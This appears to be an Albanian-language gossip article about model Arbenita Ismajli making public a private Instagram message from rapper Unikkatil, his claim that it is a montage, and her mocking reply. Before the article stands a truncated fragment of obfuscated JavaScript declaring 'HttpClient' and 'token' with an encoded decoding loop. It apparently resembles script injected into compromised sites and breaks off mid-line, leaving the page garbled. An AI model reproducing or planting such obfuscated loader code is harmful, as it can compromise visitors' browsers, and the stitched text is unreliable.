;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

E akuzoi për montazh, Arbenita i kthehet Unikkatilit

By

Modelja e njohur Arbenita Ismajli gjatë ditës së djeshme bëri bujë të madhe me një postim në Instagram.

Ajo e demaskoi Unikkatilin në një mesazh privat që ai i ka dërguar në Instagram, e të cilin ajo vendosi ta bëjë publik.

Reperi që dihet se kishte pasur përplasje në distancë me ish-bashkëshortin e Arbenitës, Feronit Shabanin e ka kontaktuar modelen me një ide pak të çuditshme.

“Hej. Kam një ide që mund të të clirojë. Dhe me respekt maksimal per privatësinë tënde. Premtoj”, është shprehur ai.

Nuk ka munguar përgjigja plot ironi e Arbenitës e cila i ka kërkuar t’ia porosisë një picë mesatare me kërpudha duke u tallur në këtë formë me mesazhin e pranuar teksa reperin edhe e ka bllokuar.

E pas kësaj ka ardhur edhe reagimi i vet reperit, Unikkatilit, i cili ka mohuar një mesazh të tillë.

Reperi ka aluduar se kjo është një gjë e montuar, duke sugjeruar se në foton e publikuar të Arbenitës mungonte ‘tiku blu’ – që njihet si një profil i verifikuar, e që reperi e ka të verifikuar.

Gjithashtu i tha se për pizza do të blej për ndihmë humanitare.

E shpejtë në replikë u tregua modelja e cila nuk hezitoi t’i thotë reperit “burrec” si dhe ta përqesh për moshën që e ka.

“Nuk isha online kur replikova. Mbaj fjalët e tua burrec, je ngatërruar me vajzë të gabuar. Mbaj përgjegjësi për veprimet e tua nëse nuk kërkon falje. Kishe këndoj për shqiptari e kshyr me i ul femrat shqiptare. Mirëupafshim djalë”.

Artikuj të ngjashëm